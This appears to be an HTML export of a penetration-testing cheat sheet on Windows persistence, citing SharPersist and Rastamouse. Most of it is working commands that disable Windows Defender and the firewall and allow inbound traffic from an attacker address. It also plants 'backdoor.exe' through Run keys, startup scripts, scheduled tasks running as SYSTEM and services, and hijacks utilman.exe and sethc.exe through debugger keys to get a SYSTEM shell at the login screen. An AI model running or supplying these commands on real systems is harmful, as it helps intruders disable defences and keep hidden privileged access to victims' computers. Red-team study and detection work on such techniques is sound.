<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><title>Windows - Persistence</title><style>
/* webkit printing magic: print all background colors */
html {
	-webkit-print-color-adjust: exact;
}
* {
	box-sizing: border-box;
	-webkit-print-color-adjust: exact;
}

html,
body {
	margin: 0;
	padding: 0;
}
@media only screen {
	body {
		margin: 2em auto;
		max-width: 900px;
		color: rgb(55, 53, 47);
	}
}

body {
	line-height: 1.5;
	white-space: pre-wrap;
}

a,
a.visited {
	color: inherit;
	text-decoration: underline;
}

.pdf-relative-link-path {
	font-size: 80%;
	color: #444;
}

h1,
h2,
h3 {
	letter-spacing: -0.01em;
	line-height: 1.2;
	font-weight: 600;
	margin-bottom: 0;
}

.page-title {
	font-size: 2.5rem;
	font-weight: 700;
	margin-top: 0;
	margin-bottom: 0.75em;
}

h1 {
	font-size: 1.875rem;
	margin-top: 1.875rem;
}

h2 {
	font-size: 1.5rem;
	margin-top: 1.5rem;
}

h3 {
	font-size: 1.25rem;
	margin-top: 1.25rem;
}

.source {
	border: 1px solid #ddd;
	border-radius: 3px;
	padding: 1.5em;
	word-break: break-all;
}

.callout {
	border-radius: 3px;
	padding: 1rem;
}

figure {
	margin: 1.25em 0;
	page-break-inside: avoid;
}

figcaption {
	opacity: 0.5;
	font-size: 85%;
	margin-top: 0.5em;
}

mark {
	background-color: transparent;
}

.indented {
	padding-left: 1.5em;
}

hr {
	background: transparent;
	display: block;
	width: 100%;
	height: 1px;
	visibility: visible;
	border: none;
	border-bottom: 1px solid rgba(55, 53, 47, 0.09);
}

img {
	max-width: 100%;
}

@media only print {
	img {
		max-height: 100vh;
		object-fit: contain;
	}
}

@page {
	margin: 1in;
}

.collection-content {
	font-size: 0.875rem;
}

.column-list {
	display: flex;
	justify-content: space-between;
}

.column {
	padding: 0 1em;
}

.column:first-child {
	padding-left: 0;
}

.column:last-child {
	padding-right: 0;
}

.table_of_contents-item {
	display: block;
	font-size: 0.875rem;
	line-height: 1.3;
	padding: 0.125rem;
}

.table_of_contents-indent-1 {
	margin-left: 1.5rem;
}

.table_of_contents-indent-2 {
	margin-left: 3rem;
}

.table_of_contents-indent-3 {
	margin-left: 4.5rem;
}

.table_of_contents-link {
	text-decoration: none;
	opacity: 0.7;
	border-bottom: 1px solid rgba(55, 53, 47, 0.18);
}

table,
th,
td {
	border: 1px solid rgba(55, 53, 47, 0.09);
	border-collapse: collapse;
}

table {
	border-left: none;
	border-right: none;
}

th,
td {
	font-weight: normal;
	padding: 0.25em 0.5em;
	line-height: 1.5;
	min-height: 1.5em;
	text-align: left;
}

th {
	color: rgba(55, 53, 47, 0.6);
}

ol,
ul {
	margin: 0;
	margin-block-start: 0.6em;
	margin-block-end: 0.6em;
}

li > ol:first-child,
li > ul:first-child {
	margin-block-start: 0.6em;
}

ul > li {
	list-style: disc;
}

ul.to-do-list {
	text-indent: -1.7em;
}

ul.to-do-list > li {
	list-style: none;
}

.to-do-children-checked {
	text-decoration: line-through;
	opacity: 0.375;
}

ul.toggle > li {
	list-style: none;
}

ul {
	padding-inline-start: 1.7em;
}

ul > li {
	padding-left: 0.1em;
}

ol {
	padding-inline-start: 1.6em;
}

ol > li {
	padding-left: 0.2em;
}

.mono ol {
	padding-inline-start: 2em;
}

.mono ol > li {
	text-indent: -0.4em;
}

.toggle {
	padding-inline-start: 0em;
	list-style-type: none;
}

/* Indent toggle children */
.toggle > li > details {
	padding-left: 1.7em;
}

.toggle > li > details > summary {
	margin-left: -1.1em;
}

.selected-value {
	display: inline-block;
	padding: 0 0.5em;
	background: rgba(206, 205, 202, 0.5);
	border-radius: 3px;
	margin-right: 0.5em;
	margin-top: 0.3em;
	margin-bottom: 0.3em;
	white-space: nowrap;
}

.collection-title {
	display: inline-block;
	margin-right: 1em;
}

time {
	opacity: 0.5;
}

.icon {
	display: inline-block;
	max-width: 1.2em;
	max-height: 1.2em;
	text-decoration: none;
	vertical-align: text-bottom;
	margin-right: 0.5em;
}

img.icon {
	border-radius: 3px;
}

.user-icon {
	width: 1.5em;
	height: 1.5em;
	border-radius: 100%;
	margin-right: 0.5rem;
}

.user-icon-inner {
	font-size: 0.8em;
}

.text-icon {
	border: 1px solid #000;
	text-align: center;
}

.page-cover-image {
	display: block;
	object-fit: cover;
	width: 100%;
	height: 30vh;
}

.page-header-icon {
	font-size: 3rem;
	margin-bottom: 1rem;
}

.page-header-icon-with-cover {
	margin-top: -0.72em;
	margin-left: 0.07em;
}

.page-header-icon img {
	border-radius: 3px;
}

.link-to-page {
	margin: 1em 0;
	padding: 0;
	border: none;
	font-weight: 500;
}

p > .user {
	opacity: 0.5;
}

td > .user,
td > time {
	white-space: nowrap;
}

input[type="checkbox"] {
	transform: scale(1.5);
	margin-right: 0.6em;
	vertical-align: middle;
}

p {
	margin-top: 0.5em;
	margin-bottom: 0.5em;
}

.image {
	border: none;
	margin: 1.5em 0;
	padding: 0;
	border-radius: 0;
	text-align: center;
}

.code,
code {
	background: rgba(135, 131, 120, 0.15);
	border-radius: 3px;
	padding: 0.2em 0.4em;
	border-radius: 3px;
	font-size: 85%;
	tab-size: 2;
}

code {
	color: #eb5757;
}

.code {
	padding: 1.5em 1em;
}

.code > code {
	background: none;
	padding: 0;
	font-size: 100%;
	color: inherit;
}

blockquote {
	font-size: 1.25em;
	margin: 1em 0;
	padding-left: 1em;
	border-left: 3px solid rgb(55, 53, 47);
}

.bookmark-href {
	font-size: 0.75em;
	opacity: 0.5;
}

.sans { font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol"; }
.code { font-family: 'SFMono-Regular', Consolas, 'Liberation Mono', Menlo, Courier, monospace; }
.serif { font-family: Lyon-Text, Georgia, KaiTi, STKaiTi, '华文楷体', KaiTi_GB2312, '楷体_GB2312', serif; }
.mono { font-family: Nitti, 'Microsoft YaHei', '微软雅黑', monospace; }
.pdf .sans { font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol", 'Twemoji', 'Noto Color Emoji', 'Noto Sans CJK SC', 'Noto Sans CJK KR'; }

.pdf .code { font-family: Source Code Pro, 'SFMono-Regular', Consolas, 'Liberation Mono', Menlo, Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK SC', 'Noto Sans Mono CJK KR'; }

.pdf .serif { font-family: PT Serif, Lyon-Text, Georgia, KaiTi, STKaiTi, '华文楷体', KaiTi_GB2312, '楷体_GB2312', serif, 'Twemoji', 'Noto Color Emoji', 'Noto Sans CJK SC', 'Noto Sans CJK KR'; }

.pdf .mono { font-family: PT Mono, Nitti, 'Microsoft YaHei', '微软雅黑', monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK SC', 'Noto Sans Mono CJK KR'; }

.highlight-default {
}
.highlight-gray {
	color: rgb(155,154,151);
}
.highlight-brown {
	color: rgb(100,71,58);
}
.highlight-orange {
	color: rgb(217,115,13);
}
.highlight-yellow {
	color: rgb(223,171,1);
}
.highlight-teal {
	color: rgb(15,123,108);
}
.highlight-blue {
	color: rgb(11,110,153);
}
.highlight-purple {
	color: rgb(105,64,165);
}
.highlight-pink {
	color: rgb(173,26,114);
}
.highlight-red {
	color: rgb(224,62,62);
}
.highlight-gray_background {
	background: rgb(235,236,237);
}
.highlight-brown_background {
	background: rgb(233,229,227);
}
.highlight-orange_background {
	background: rgb(250,235,221);
}
.highlight-yellow_background {
	background: rgb(251,243,219);
}
.highlight-teal_background {
	background: rgb(221,237,234);
}
.highlight-blue_background {
	background: rgb(221,235,241);
}
.highlight-purple_background {
	background: rgb(234,228,242);
}
.highlight-pink_background {
	background: rgb(244,223,235);
}
.highlight-red_background {
	background: rgb(251,228,228);
}
.block-color-default {
	color: inherit;
	fill: inherit;
}
.block-color-gray {
	color: rgba(55, 53, 47, 0.6);
	fill: rgba(55, 53, 47, 0.6);
}
.block-color-brown {
	color: rgb(100,71,58);
	fill: rgb(100,71,58);
}
.block-color-orange {
	color: rgb(217,115,13);
	fill: rgb(217,115,13);
}
.block-color-yellow {
	color: rgb(223,171,1);
	fill: rgb(223,171,1);
}
.block-color-teal {
	color: rgb(15,123,108);
	fill: rgb(15,123,108);
}
.block-color-blue {
	color: rgb(11,110,153);
	fill: rgb(11,110,153);
}
.block-color-purple {
	color: rgb(105,64,165);
	fill: rgb(105,64,165);
}
.block-color-pink {
	color: rgb(173,26,114);
	fill: rgb(173,26,114);
}
.block-color-red {
	color: rgb(224,62,62);
	fill: rgb(224,62,62);
}
.block-color-gray_background {
	background: rgb(235,236,237);
}
.block-color-brown_background {
	background: rgb(233,229,227);
}
.block-color-orange_background {
	background: rgb(250,235,221);
}
.block-color-yellow_background {
	background: rgb(251,243,219);
}
.block-color-teal_background {
	background: rgb(221,237,234);
}
.block-color-blue_background {
	background: rgb(221,235,241);
}
.block-color-purple_background {
	background: rgb(234,228,242);
}
.block-color-pink_background {
	background: rgb(244,223,235);
}
.block-color-red_background {
	background: rgb(251,228,228);
}

.checkbox {
	display: inline-flex;
	vertical-align: text-bottom;
	width: 16;
	height: 16;
	background-size: 16px;
	margin-left: 2px;
	margin-right: 5px;
}

.checkbox-on {
	background-image: url("data:image/svg+xml;charset=UTF-8,%3Csvg%20width%3D%2216%22%20height%3D%2216%22%20viewBox%3D%220%200%2016%2016%22%20fill%3D%22none%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Crect%20width%3D%2216%22%20height%3D%2216%22%20fill%3D%22%2358A9D7%22%2F%3E%0A%3Cpath%20d%3D%22M6.71429%2012.2852L14%204.9995L12.7143%203.71436L6.71429%209.71378L3.28571%206.2831L2%207.57092L6.71429%2012.2852Z%22%20fill%3D%22white%22%2F%3E%0A%3C%2Fsvg%3E");
}

.checkbox-off {
	background-image: url("data:image/svg+xml;charset=UTF-8,%3Csvg%20width%3D%2216%22%20height%3D%2216%22%20viewBox%3D%220%200%2016%2016%22%20fill%3D%22none%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Crect%20x%3D%220.75%22%20y%3D%220.75%22%20width%3D%2214.5%22%20height%3D%2214.5%22%20fill%3D%22white%22%20stroke%3D%22%2336352F%22%20stroke-width%3D%221.5%22%2F%3E%0A%3C%2Fsvg%3E");
}
	
</style></head><body><article id="fb1c2872-afac-4654-bac7-86e1f75dcb4a" class="page sans"><header><h1 class="page-title">Windows - Persistence</h1></header><div class="page-body"><h1 id="a36e4cfa-3427-4830-ac04-e01b47b095c9" class="">Windows - Persistence</h1><h2 id="d7290e30-f3e4-4e3d-a483-e5233813fc7b" class="">Summary</h2><ul id="1db52e9d-bf3f-48fc-938f-bee4455e4862" class="bulleted-list"><li><a href="about:blank#tools">Tools</a></li></ul><ul id="1d493f9f-ef18-44d0-8fc4-3e552967300f" class="bulleted-list"><li><a href="about:blank#disable-windows-defender">Disable Windows Defender</a></li></ul><ul id="cbdb9eaf-67fc-4ad6-9070-42abd4b8080d" class="bulleted-list"><li><a href="about:blank#disable-windows-firewall">Disable Windows Firewall</a></li></ul><ul id="7742e6fd-d75c-408c-ae81-134e31cbff49" class="bulleted-list"><li><a href="about:blank#userland">Userland</a><ul id="e0f7ecb2-dbe1-4642-bfaa-ef12c6e674ea" class="bulleted-list"><li><a href="about:blank#registry">Registry</a></li></ul><ul id="4226cdfb-5703-49de-a09e-ba4c48bd171a" class="bulleted-list"><li><a href="about:blank#startup">Startup</a></li></ul><ul id="d682fef7-0ee7-4efd-a50d-61aaee563e7e" class="bulleted-list"><li><a href="about:blank#scheduled-task">Scheduled Task</a></li></ul></li></ul><ul id="c066f025-7cf1-481d-88c7-96841d1d5acd" class="bulleted-list"><li><a href="about:blank#elevated">Elevated</a><ul id="e90b62be-bc8e-4fbd-a521-9ea6e0a632d9" class="bulleted-list"><li><a href="about:blank#hklm">HKLM</a></li></ul><ul id="a9478c48-41c3-4b18-901c-e954fa2dda83" class="bulleted-list"><li><a href="about:blank#services">Services</a></li></ul><ul id="4a022b35-aac4-479e-b06d-23cc35534a07" class="bulleted-list"><li><a href="about:blank#scheduled-task">Scheduled Task</a></li></ul><ul id="5d493def-5b5b-4431-b659-d930d8d3aa97" class="bulleted-list"><li><a href="about:blank#rdp-backdoor">RDP Backdoor</a></li></ul></li></ul><ul id="154e6b43-2451-454c-b077-c1dea3a1ca11" class="bulleted-list"><li><a href="about:blank#references">References</a></li></ul><h2 id="2bb4b117-8902-4412-8190-d97559f6566c" class="">Tools</h2><ul id="342d96c6-b9b0-458a-9e49-43a93cd82aa1" class="bulleted-list"><li>[SharPersist - Windows persistence toolkit written in C#. - @h4wkst3r](https://github.com/fireeye/SharPersist)</li></ul><h2 id="232c7e98-baef-4d05-8de5-b559aabaaad2" class="">Disable Windows Defender</h2><pre id="a6ee3bce-90b2-4473-ae7d-8545b22d17de" class="code"><code>sc config WinDefend start= disabledsc stop WinDefendSet-MpPreference -DisableRealtimeMonitoring $true</code></pre><h2 id="a65e53bb-20e1-41c2-aa63-54c380670aff" class="">Disable Windows Firewall</h2><pre id="ee55f4ab-fb62-4ca0-93be-0e2e36adafd0" class="code"><code>Netsh Advfirewall show allprofilesNetSh Advfirewall set allprofiles state off# ip whitelistingNew-NetFirewallRule -Name morph3inbound -DisplayName morph3inbound -Enabled True -Direction Inbound -Protocol ANY -Action Allow -Profile ANY -RemoteAddress ATTACKER_IP</code></pre><h2 id="1a8b900c-b88e-49cd-8477-7447a922e4aa" class="">Userland</h2><p id="b39269aa-9bf7-44da-a41d-235ddd0ce023" class="">Set a file as hidden</p><pre id="dfe8613d-31ac-4149-94f5-d3c9e17658a8" class="code"><code>attrib +h c:\autoexec.bat</code></pre><h3 id="bc9be4fe-2517-4c21-9f13-85442a5af816" class="">Registry</h3><p id="8837bf78-b747-434b-8bd7-98f2f1499d9f" class="">Create a REG_SZ value in the Run key within HKCU.</p><pre id="415f655b-fa5a-4cc5-95cb-462c4ba1026f" class="code"><code>Value name:  BackdoorValue data:  C:\Users\Rasta\AppData\Local\Temp\backdoor.exe</code></pre><p id="90e7ec2d-e970-471d-b1ae-1f71b38f5e0f" class="">Using SharPersist</p><pre id="97a457b9-4976-45a0-b4ef-aa02dc95eb2d" class="code"><code>SharPersist -t reg -c &quot;C:\Windows\System32\cmd.exe&quot; -a &quot;/c calc.exe&quot; -k &quot;hkcurun&quot; -v &quot;Test Stuff&quot; -m addSharPersist -t reg -c &quot;C:\Windows\System32\cmd.exe&quot; -a &quot;/c calc.exe&quot; -k &quot;hkcurun&quot; -v &quot;Test Stuff&quot; -m add -o envSharPersist -t reg -c &quot;C:\Windows\System32\cmd.exe&quot; -a &quot;/c calc.exe&quot; -k &quot;logonscript&quot; -m add</code></pre><h3 id="c2438fb9-a918-4218-9586-8d651f76b5b2" class="">Startup</h3><p id="b9f1a7af-bc70-4cc8-9a3f-545524cdfd90" class="">Create a batch script in the user startup folder.</p><pre id="6141b5c7-9c9a-47d7-a9be-649c941186fc" class="code"><code>PS C:\&gt; gc C:\Users\Rasta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\backdoor.batstart /b C:\Users\Rasta\AppData\Local\Temp\backdoor.exe</code></pre><p id="62dcaa74-ef8e-4adf-aa79-5ed19fed1b4a" class="">Using SharPersist</p><pre id="515f0f9b-ee0d-4ee6-a695-a060846a9f1f" class="code"><code>SharPersist -t startupfolder -c &quot;C:\Windows\System32\cmd.exe&quot; -a &quot;/c calc.exe&quot; -f &quot;Some File&quot; -m add</code></pre><h3 id="5fc4b65e-76e5-4260-a684-301e5241fd76" class="">Scheduled Task</h3><pre id="729744ab-4998-4a1c-bde7-a13220e3b081" class="code"><code>PS C:\&gt; $A = New-ScheduledTaskAction -Execute &quot;cmd.exe&quot; -Argument &quot;/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe&quot;PS C:\&gt; $T = New-ScheduledTaskTrigger -AtLogOn -User &quot;Rasta&quot;PS C:\&gt; $P = New-ScheduledTaskPrincipal &quot;Rasta&quot;PS C:\&gt; $S = New-ScheduledTaskSettingsSetPS C:\&gt; $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $SPS C:\&gt; Register-ScheduledTask Backdoor -InputObject $D</code></pre><p id="f5feb57a-2515-4a88-b3e4-2e618c03b28b" class="">Using SharPersist</p><pre id="3d55234e-0f65-4e81-a7c0-21b63d821083" class="code"><code># Add to a current scheduled taskSharPersist -t schtaskbackdoor -c &quot;C:\Windows\System32\cmd.exe&quot; -a &quot;/c calc.exe&quot; -n &quot;Something Cool&quot; -m add# Add new taskSharPersist -t schtask -c &quot;C:\Windows\System32\cmd.exe&quot; -a &quot;/c calc.exe&quot; -n &quot;Some Task&quot; -m addSharPersist -t schtask -c &quot;C:\Windows\System32\cmd.exe&quot; -a &quot;/c calc.exe&quot; -n &quot;Some Task&quot; -m add -o hourly</code></pre><h2 id="58f06e8f-b431-4964-97f8-baab95602a7f" class="">Windows Service</h2><p id="ec7aca58-b151-42d9-9255-ff5e5ee97390" class="">Using SharPersist</p><pre id="c885b08a-823a-4b24-adf8-41e71882e25a" class="code"><code>SharPersist -t service -c &quot;C:\Windows\System32\cmd.exe&quot; -a &quot;/c calc.exe&quot; -n &quot;Some Service&quot; -m add</code></pre><h2 id="d7a54224-b995-412a-b4d4-34b2a39ce99e" class="">Elevated</h2><h3 id="6a38ae6e-a98e-4a1c-8080-894504f61091" class="">HKLM</h3><p id="73eaadd7-6eb1-447e-b081-b574975aad16" class="">Similar to HKCU. Create a REG_SZ value in the Run key within HKLM.</p><pre id="01f4d72b-2d4c-4735-a00c-d2485497de02" class="code"><code>Value name:  BackdoorValue data:  C:\Windows\Temp\backdoor.exe</code></pre><h3 id="9137ab7c-52a8-4dee-ab81-2c309abd1484" class="">Services</h3><p id="96a21ed9-beeb-4616-bb67-989fe4a18bf2" class="">Create a service that will start automatically or on-demand.</p><pre id="e621f008-d1f7-491c-948e-363c9adf0af9" class="code"><code>PS C:\&gt; New-Service -Name &quot;Backdoor&quot; -BinaryPathName &quot;C:\Windows\Temp\backdoor.exe&quot; -Description &quot;Nothing to see here.&quot;</code></pre><h3 id="7f878d69-61e6-436a-abe5-a2fe1efd779e" class="">Scheduled Tasks</h3><p id="c2d2d22f-c549-434e-bd5c-55d057d9322d" class="">Scheduled Task to run as SYSTEM, everyday at 9am.</p><pre id="d3a9febe-bbd8-4865-b153-a7c8ca3fb7d2" class="code"><code>PS C:\&gt; $A = New-ScheduledTaskAction -Execute &quot;cmd.exe&quot; -Argument &quot;/c C:\Windows\Temp\backdoor.exe&quot;PS C:\&gt; $T = New-ScheduledTaskTrigger -Daily -At 9amPS C:\&gt; $P = New-ScheduledTaskPrincipal &quot;NT AUTHORITY\SYSTEM&quot; -RunLevel HighestPS C:\&gt; $S = New-ScheduledTaskSettingsSetPS C:\&gt; $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $SPS C:\&gt; Register-ScheduledTask Backdoor -InputObject $D</code></pre><h3 id="85fc8060-52cd-4018-8c27-e575f78b842c" class="">RDP Backdoor</h3><h3 id="f2a848bf-fd7b-4cd9-8525-3d79f6713ac3" class="">utilman.exe</h3><p id="5897b6d8-3df1-4ee4-a185-12b25370e103" class="">At the login screen, press Windows Key+U, and you get a cmd.exe window as SYSTEM.</p><pre id="15b4b28b-92eb-4ca1-86d7-709ca9150a9c" class="code"><code>REG ADD &quot;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe&quot; /t REG_SZ /v Debugger /d “C:\windows\system32\cmd.exe” /f</code></pre><h3 id="571adbc0-38c6-4617-9525-a2d510b8d58d" class="">sethc.exe</h3><p id="7d8a8d6d-0dc3-42ad-a2d4-d6ff3c275a3e" class="">Hit F5 a bunch of times when you are at the RDP login screen.</p><pre id="34c6e048-6cb4-4b88-bb57-800a82f2ff44" class="code"><code>REG ADD &quot;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe&quot; /t REG_SZ /v Debugger /d “C:\windows\system32\cmd.exe” /f</code></pre><h2 id="454c82e6-3a3c-49f8-a2d2-146a49cd5cea" class="">References</h2><ul id="08c56006-a747-427a-b0ad-a15e1ccc3fe6" class="bulleted-list"><li><a href="https://rastamouse.me/2018/03/a-view-of-persistence/">A view of persistence - Rastamouse</a></li></ul><ul id="66434ee5-9c44-4c0d-8bf7-d0094f90e7dc" class="bulleted-list"><li><a href="http://pwnwiki.io/#!persistence/windows/index.md">Windows Persistence Commands - Pwn Wiki</a></li></ul><ul id="2f1df384-b32b-4228-94e5-2cdf29649362" class="bulleted-list"><li><a href="http://www.youtube.com/watch?v=K7o9RSVyazo">SharPersist Windows Persistence Toolkit in C - Brett Hawkins</a></li></ul></div></article></body></html>